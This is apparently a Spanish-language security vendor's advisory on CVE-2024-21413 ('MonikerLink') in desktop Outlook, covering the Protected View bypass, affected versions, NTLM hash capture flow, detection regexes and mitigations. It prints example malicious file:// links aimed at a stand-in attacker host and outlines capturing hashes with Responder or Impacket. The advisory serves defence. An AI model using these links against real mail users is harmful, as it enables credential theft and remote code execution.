剣 KENSAI
Crítica CVE-2024-21413 Enero de 2026 · 8 min de lectura

CVE-2024-21413: RCE MonikerLink en Microsoft Outlook

Conocida como «MonikerLink», CVE-2024-21413 es una vulnerabilidad crítica de Microsoft Outlook que elude la Vista protegida para lograr la ejecución remota de código y el robo de credenciales NTLM con solo obtener una vista previa de un correo malicioso. CVSS 9.8 CRÍTICA. No requiere ninguna interacción del usuario más allá de la vista previa del correo.


9.8
CRÍTICA
AtributoValor
ID de CVECVE-2024-21413
Vector CVSSAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWECWE-20: Validación incorrecta de entradas
Publicada13 de febrero de 2024
ExplotaciónPoC pública — ampliamente explotada

¿Qué es CVE-2024-21413?

CVE-2024-21413 explota la forma en que Microsoft Outlook gestiona los hipervínculos que contienen el carácter ! (signo de exclamación) como parte del URI de un moniker de archivo. Normalmente, Outlook aplica la «Vista protegida» a los documentos abiertos desde el correo electrónico y ejecuta los documentos de Office en un entorno aislado para impedir la ejecución de código. Esta vulnerabilidad elude por completo dicha protección.

Al crear un hipervínculo con el formato file://ATTACKER-SERVER/test.rtf!something, un atacante provoca que Outlook abra el archivo RTF sin la Vista protegida y, al mismo tiempo, inicia un intento automático de autenticación NTLM contra el servidor SMB del atacante. El atacante captura el hash NTLMv2 para descifrarlo sin conexión o utilizarlo en ataques de retransmisión.

🚨 Ataque desde el panel de vista previa — No requiere clics

Esta vulnerabilidad se activa en el panel de vista previa de Outlook. La víctima solo tiene que seleccionar el correo electrónico en su bandeja de entrada; no necesita abrir ningún archivo adjunto ni hacer clic en ningún enlace. En un entorno corporativo, un único correo de phishing enviado a una lista de distribución podría comprometer simultáneamente cientos de hashes NTLMv2.

Productos afectados

ProductoVersiones afectadas
Microsoft Outlook 2016Anteriores a la actualización de febrero de 2024
Microsoft Outlook 2019Anteriores a la actualización de febrero de 2024
Microsoft Outlook LTSC 2021Anteriores a la actualización de febrero de 2024
Microsoft 365 Apps for EnterpriseAnteriores a la actualización de febrero de 2024

No afectados: Outlook en la web (OWA), Outlook para iOS/Android y Outlook para Mac. La vulnerabilidad es específica de los clientes de escritorio de Outlook para Windows.

Mecánica del ataque: la técnica MonikerLink

COM (Modelo de objetos componentes) de Windows utiliza «monikers» para enlazar objetos por nombre. El esquema de URI file:// de Windows puede incluir un componente moniker después del carácter !, que indica a Windows que cargue y active el objeto COM referenciado.

# Enlace de archivo normal — Se aplica la Vista protegida
file://attacker.com/share/document.rtf

# Evasión con MonikerLink — ! elude la Vista protegida
file://attacker.com/share/document.rtf!1337

# Cuando Outlook procesa el MonikerLink:
# 1. Intenta conectarse mediante SMB a attacker.com
# 2. Envía la autenticación NTLMv2 (se captura el hash)
# 3. Abre el archivo sin la Vista protegida
# 4. Si el archivo es un RTF malicioso → RCE

Flujo de captura del hash NTLM

Incluso sin un archivo RTF preparado como arma, el ataque de retransmisión NTLM tiene un impacto significativo:

  1. La víctima obtiene una vista previa del correo malicioso en Outlook
  2. Outlook establece automáticamente una conexión SMB con el servidor controlado por el atacante
  3. Windows envía el desafío-respuesta NTLMv2 (hash) para autenticarse
  4. El atacante captura el hash con Responder, Impacket o herramientas similares
  5. El hash se descifra sin conexión (las contraseñas débiles pueden descifrarse en horas) o se retransmite en tiempo real a otros servicios

Explotación en situaciones reales

Tras la publicación de la PoC, CVE-2024-21413 se incorporó en cuestión de días a kits comerciales de phishing. Las campañas observadas incluyeron:

Detección

Reglas de la puerta de enlace de correo electrónico

# Patrón regex para detectar MonikerLink en el cuerpo o los archivos adjuntos del correo
# Detecta enlaces file:// que contienen el carácter !
\bfile:\/\/[^\s"']+![^\s"']*

# Bloquea por completo los enlaces UNC/file externos (recomendado)
\bfile:\/\/[^\s"']+
\\\\[a-z0-9.-]+\\

Detección de red

Detección en endpoints

Mitigación

  1. Aplicar los parches de febrero de 2024: La actualización de seguridad de Microsoft para Outlook corrige la evasión de la Vista protegida
  2. Bloquear el tráfico SMB saliente en el perímetro: Las reglas de firewall que bloquean el tráfico TCP/445 y TCP/139 saliente impiden capturar hashes NTLM incluso si se activa la vulnerabilidad
  3. Activar las protecciones contra la retransmisión NTLM: Configurar la firma SMB y la firma LDAP para impedir ataques de retransmisión
  4. Implementar una puerta de enlace de seguridad del correo electrónico: Bloquear los correos que contengan enlaces file:// y \\ (rutas UNC) en el cuerpo y los archivos adjuntos
  5. Desactivar NTLM cuando sea posible: Las organizaciones que utilizan Kerberos pueden desactivar NTLM para eliminar la vía de ataque de captura de hashes

💡 Defensa en profundidad: Aunque ya haya aplicado el parche a Outlook, bloquear el tráfico SMB saliente en el firewall es una práctica recomendada que impide toda esta clase de ataques. Muchas organizaciones permiten el tráfico SMB saliente por motivos relacionados con sistemas heredados de intercambio de archivos; audítelo y restrínjalo de inmediato.

Capacidad de detección de KENSAI

¿Están sus clientes de Outlook protegidos con parches contra MonikerLink?

KENSAI analiza su flota de endpoints para detectar versiones vulnerables de Outlook e identifica las rutas de red que permitirían capturar hashes NTLM. Obtenga visibilidad en cuestión de minutos.

Evalúe la superficie de ataque de su correo electrónico →

Artículos relacionados

Plataforma de seguridad para la gestión de vulnerabilidades y la evaluación de certificación ISO 27001 Blog de seguridad Microsoft Patch Tuesday: 84 vulnerabilidades y ataque Stryker